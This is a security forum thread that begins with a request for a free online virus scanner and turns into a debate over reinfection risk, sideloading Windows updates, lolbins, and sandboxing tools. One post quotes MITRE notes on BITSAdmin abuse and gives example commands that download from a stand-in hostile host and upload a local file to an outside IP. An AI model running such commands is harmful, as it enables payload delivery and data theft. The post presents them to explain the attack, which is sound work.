I need a free online virus scanner

Discussion in 'other anti-virus software' started by Melita, Dec 23, 2020.

  1. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,116
    Norton isn't free and neither are second opinion scanners, so are not what the original poster is looking for.
     
  2. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    yes but your best bet is to sell\throw away your stuff are re-buy new, change internet provider, router etc
    otherwise wipe 1 time, however the procedure is not 100% guarantee at you can make mistakes that allow re-infection, via mbr, hypervisor, slack space, bad sectors, hidden partitions, interrupt hooks, message hooks, SSDT hooks, IRP hooks, DKOM, usb stick, router etc. anything that has storage space can guarantee persistency (a reasonable amount of storage space). Don't connect to the Internet until your OS is hardened , patched and updated: do some side-loading of updates on fresh OS. According to many pentesting sites it is not safe to connect straight away after installing windows
    An idea I had on this are different OS installs on bootable media, with rootkit detection modules and AV scanners like ClamAV, starting Linux with Chkrootkit, Rkdetector, Zeppoo, kstat, elfstat, rkhunter. Linux so you are hoping it won't get infected,
    the problem is that once infected they know so much about you that it is possible to be attacked at some point again. I would not worry about personal data since they effectively hack governments , companies and agencies so it is probably in their hands anyway, banking trojans suck though, so don't do shopping on untrusted OS
     
    Last edited: Jan 15, 2021
  3. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,116
    @lucd Absolutely none of that is necessary. Literally not a single thing. You must be exceptionally paranoid. If you do a clean install of Windows there is no need to be offline until the OS is updated. In the early days of XP, you could get infected just by being connecting to the internet. However, that changed when XP Service Pack 2 was released in 2004, which had Windows Firewall enabled by default. It's fine to install Windows and then run Windows Update. As for hardening Windows, unless you don't keep your system updated, or are the type of person who is click happy and opens random files, it's not needed. There's nothing wrong with hardening a system. But for many people it's really not needed. By just keeping your system updated and being careful about what files you open, it is typically extremely hard to get infected. That has been my experience over many years.

    The only security software I use on my main PC is an antivirus. I've done nothing to harden my system or make it more secure and have not been infected for years.
     
  4. digmor crusher

    digmor crusher Registered Member

    Joined:
    Jul 6, 2012
    Posts:
    972
    Location:
    Canada
    HUH!!!
     
  5. Dermot7

    Dermot7 Registered Member

    Joined:
    Dec 20, 2009
    Posts:
    3,412
    Location:
    Surrey, England.
    For a few years I've been using the ESET service for this, if required, and have found it to be effective, easy to use, comprehensive, and giving few (if any) FPs or issues. Recommended:thumb: https://www.eset.com/uk/home/online-scanner/
     
  6. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    do you know this post? its a bit old but the guy who is actually a pentester and he recommends sideloading and offline jobs:
    https://hackernoon.com/the-2017-pentester-guide-to-windows-10-privacy-security-cf734c510b8d

    check attack mitre's site for bits admin and outbound connections and similar

    [You must be exceptionally paranoid]
    the Op asked for more "advanced" programs

    wait to see until you get hacked, let's see if your view is gonna change?
    it's literally like buying yourself a gun or not, until you get badly hurt your view is going to be different, its the same with pretty much anything
    on a more serious note though, if you don't suspect being infected none of that would be remotely necessary, just a last resort of sorts until you give it to somebody competent, it also could be fun to fiddle with new programs and OS core components,

    unexperienced person (like me) is more likely to break things than fix them though,

    if you have time its good fun overall, if it's already broken (due to infection) why not break it more?
     
    Last edited: Jan 22, 2021
  7. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,116
    So what if he does? It's just one person's opinion. My experience over many years on lots of different PCs, is that the only times I've ever got infected, is when I've manually launched an infected file. I've never got infected before Windows Update has finished downloading and installed all the available updates. If I ever did, I would need to rethink things. But, it's not happened yet, and I've done hundreds of Windows installs.

    There was one time I got infected just by visiting a malicious website (the first time I've been infected in many years). But in that case the computer was running old versions of Flash and Java, which is how it would have happened. This had nothing to do with Windows Updates, it was because of vulnerable third party software.
    There's a big difference between extremely paranoid and making ridiculous and unnecessary suggestions, such as "your best bet is to sell throw away your stuff are re-buy new, change internet provider, router etc" and using advanced programs.
    I got infected with ransomware a few days ago, because I launched an infected file, and my opinion has not changed. It has been my experience over many years is that if you keep your system and vulnerable programs updated and not click happy, then it is extremely hard to get infected. In this case, I only got infected because I launched an infected file. If I had been more careful, I would not have been infected.
    I am someone competent. I've got 30 years experience in malware removal. In the past thirty years, I've never been even the slightest bit paranoid when it comes to computer security, not even once. My experience has confirmed that I don't need to be.
     
  8. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    there is no offensive language or intention in my posts so I don't think I have to answer to any of that, I explained all the motivations, and I also highlighted what can happen if you use any of that, there is a reason somebody invented such programs and I also had my posts filled with irony and self-critique, I said clearly to use for fun if you like breaking your own stuff, I do, now I don't have time anymore

    [30 years of experience..]

    that's very nice, I like that

    @Roger I am not paranoid if I allow myself to post on public forums

    I repeat that router re-infections are a thing today, you think why they invented programmable SDN + NFV networks and why it's trending?

    re-image or reinstall of OS is not gonna do it (sometimes)
     
    Last edited: Jan 22, 2021
  9. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,234
    Location:
    Europe
    Where are the attack vectors even? Assuming the usb flash was clean to begin with, it would be either windows' update servers being compromised, or your local network (router or whatever) being compromised and then being pushed malware through there. I dont see how else would u get infected before updating windows, assuming its the first thing u do when u install windows 10.

    Yep playing with cracked stuff is tricky, u gotta have knowledge. But dont talk about it, the mods wont like it.

    I was using some old linksys router from like 2005, worked fine till I upgraded to faster internet speed, since the max it could support was like 50-60 mbit or smth. Its not like u see hacker kids neighbours so often. 98% of people will turn on wifi, see ur password protected and move on (or not see at all if u hide the ssid).
     
  10. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    unaware people would start browsing with unpatched edge and click links and stuff, they don't wait for the OS to be fully patched, I think it's also that

    patching os by sideloading is not that bad you go to windows update catalog:
    type: Cumulative Update for Windows 10 Version 2004 for x64-based Systems
    and or:
    windows 10 2004 Cumulative Update for .NET Framework (sometimes contained in the security patch above already, so it's redundant)

    download it from clean os, check it, scan it, and that's it, it's a bigger deal if you have many os installs
     
  11. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,234
    Location:
    Europe
    don't these often come with other stuff such as preparation patches to make sure the cumulative update goes smoothly (forgot the name but they had a specific name as an update)?

    i mean yeah, u can download the rest after u update the cumulative but ye
     
  12. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    I think its for bigger changes like going from 1803 to 2004 et cetera (preparation patches), otherwise runs smoothly, I mean its not for everyone, installs from windows update catalog should not break anything, but if you start to fiddle with services and registry to block automatic updates you might run into trouble later

    I don't think windows updates are the main vector whatsoever

    the blog link I mentioned from hackernoon the guy's apparently paranoid: the OP talks of few minutes before you get infected without doing anything, it happens right at the fresh OS install, he seams knowledgeable, but did he exaggerate there a little bit? He might have seen something that that made him write this?

    if you do sideloading you potentially don't have to rely on bitsadmin and other services and protocols
    from attack mitre/sans:
    - BITSAdmin can be used to create BITS Jobs to launch a malicious process.

    - BITSAdmin can be used to create BITS Jobs to upload files from a compromised host.

    - BITSAdmin can be used to create BITS Jobs to upload and/or download files.

    - BITSAdmin can be used to create BITS Jobs to upload and/or download files from SMB file servers.
    example:
    bitsadmin /transfer X /download /priority high http://www.VeryEvilHacker.it

    Start-BitsTransfer –TransferType Upload –Source “C:\Temp\mydata.txt” –Destination http://192.168.11.22/mydata.txt et cetera
     
    Last edited: Jan 22, 2021
  13. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    18,021
    Location:
    UK
  14. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,234
    Location:
    Europe
    U said the forbidden word, careful there!

    ***** joke aside, thx for linking, I usually dont read topics with more than 2 pages cuz too much bother. Like there's no reliable way to determine what posts are better than others until u read em. Or maybe there is. Maybe u can ask the admin to implement "topic summary" thing, so people dont be like "17 pages? yeah cya". Blizzard's forums has it, it's quite nice. https://imgur.com/a/b69I5Zj

    128 replies originally (16 mins my *** , i censored that for u mod :d), but only 27 when summarized, still getting the essence and the most important stuff across. In fact if u google "summarize api" u will see a lot, idk how they accurate they are tho (havent used one recently)

    I checked the article https://hackernoon.com/the-2017-pentester-guide-to-windows-10-privacy-security-cf734c510b8d ctrl + f "bits" nothing. Also wouldnt a malware have to launch bits to download stuff from it?
     
  15. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    @Floyd 57 I don't remember if he talks about bits but he sure does talk about sideloading of updates.. ctrl+F "sideloading" keyword plz, or side-loading? anyways..

    if you haven't done so read the article its quite a nice read (it's interestingly written, though it does have some "exaggerated" parts, like getting infected in few minutes if you don't do sideloading of updates, I remember he said something like that, I've read this 1.5 year ago)

    I did my own little research on bits and lolbins in general, after umbra "bashed" me:D now bitsadmin is my enemy

    sure, but how do we know if we are infected or not, I believe we can't always know that, as this stuff integrates perfectly with OS, or sometimes launches before AV (that is also in that article)
     
    Last edited: Jan 22, 2021
  16. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,234
    Location:
    Europe
    Oh boi, have I read it :p

    I have a complete list with lolbins that I rigorously updated from various bins, back when I still used stuff like bouncer and nvt exe radar pro, if you find a post of mine listing em consider urself fortunate https://www.wilderssecurity.com/search/67645944/

    Ofc, I stopped using this at start of 2019, so they havent been updated since then. But it was a gigantic list, hundreds of entries. Too much bother tho.
     
  17. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,234
    Location:
    Europe
    the thing is, ur goal should be to prevent infection. Trying to catch infection after u've already been infected by disabling 10000000000000 stuff that malware can use is bothersome and is ****** experience and very very time consuming and its constant game of cat and mouse. thats why i stopped using stuff like that. still better than avs tho
     
  18. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    I understand your point which is quite common here on this forum (it is common because it makes logical sense), but I believe you can't know if you are infected, not always, or prevent that, you can only make it harder for "them"

    yep, rule adding is annoying, even the so-much praised novirusthanks gets on my nerves
    I need a higher intelligence to decide for me (artificial intelligence? GOD?)

    I am really getting sick of UAC and yes or no prompts
    I don't want to decide anymore, I'm tired
     
    Last edited: Jan 22, 2021
  19. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    you can't prevent clicking on links and visiting websites, even if you do safe browsing, sometimes that link is going to be bad, sometimes the legitimate program is going to be bad. the email attachment from work or your best friend can be bad, the encrypted zip or whatever, or maybe there will be time pressure
    example:
    doing research on stuff is very dangerous, since you are visiting new websites

    mistyping a website name can get you to a domain controlled by "hacker"

    humans make mistakes and some malware is stealthy
     
    Last edited: Jan 22, 2021
  20. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,116
    It is certainly possible to get infected by doing nothing more than visiting an infected website. However, the reality is that if your OS and browser are updated, thankfully it's an exceptionally rare occurrence. I regularly visit lots of random websites that I've never visited before, without getting infected. I don't use any kind of web protection, other than an ad blocker, without using any malware blocking lists. The only time I've ever been infected just from visiting a website, as I've already mentioned, was on an unpatched system.

    Just because something is possible, doesn't mean that it will happen.
     
  21. Hiltihome

    Hiltihome Registered Member

    Joined:
    Jul 5, 2013
    Posts:
    1,049
    Location:
    Baden Germany
    Let's start it all over again:
    I need a free online scanner...
     
  22. Brummelchen

    Brummelchen Registered Member

    Joined:
    Jan 3, 2009
    Posts:
    4,142
    You already got your recommendations, maybe you should start trialing out now!?
     
  23. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,234
    Location:
    Europe
    Voodooshield

    Or just Shadow defender (if u hurry on sharewareonsale u might catch it)
     
  24. Brummelchen

    Brummelchen Registered Member

    Joined:
    Jan 3, 2009
    Posts:
    4,142
  25. lucd

    lucd Registered Member

    Joined:
    Jan 30, 2018
    Posts:
    699
    Location:
    Island of Woman
    @Floyd 57 @Brummelchen

    I think I tested and ran every software listed in this post and most of them in the forum (the new ones at last 2018-2020),
    I just lack scientific knowledge to describe how they work internally but I am well familiar with these software and how they work on the surface.

    SD is not ideal for daily use, you have to switch it off sometimes, that is when malware can inject itself permanently, programs such as partition wizzard can bypass folder virtualization and destroy your original files even when you protect/virtualize everything with SD. If you want you can do a quick test, virtualize everything with SD, destroy all your your files with partition wizzard (or similar) and see if you can re-boot into original state. SD doesn't make your original files untouchable. There are programs higher in the hierarchy. Obviously files can leak out online too. We are using SD in the hope malware writers do not target SD but it is bypassable and can also be "patched" like any program can. Virtual machines and light virtual machines also require regular patches, SD is not regularly updated. As per cited article: "Malware will spread via your network, shared folders, and in some cases, even break out of the VM and compromise your host operating system. Always keep VMWare/VirtualBox and its guest-OS up to date."
    Vodooshield is also based on allow deny prompts, at least with the settings I use, it also doesn't use its own files to analyze files online but relies on OS internal files to communicate online ( outbound connections of windows internal files, I think it was svchost, with all vodooshield files allowed outbound it didn't anylize any file for me). VD is regularly patched, I like that.

    both SD and voodshiled are great but they are not the holy grail of cyber security, they are good recommendations though

    I always imagine the worst case scenario, ergo I am a little paranoid but not insane. Anyway I am sick and tired of setting rules and defences, so 1 firewall and AV will do it for, I just can't control everything and many things I don't understand so better leave it to a higher intelligence like AI or GOD, especially true if you are a programmer, when you have to allow java javaw exe online, you can't control everything with rules
    I think the Op is long gone so we can close this /thread
     
    Last edited: Jan 24, 2021
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.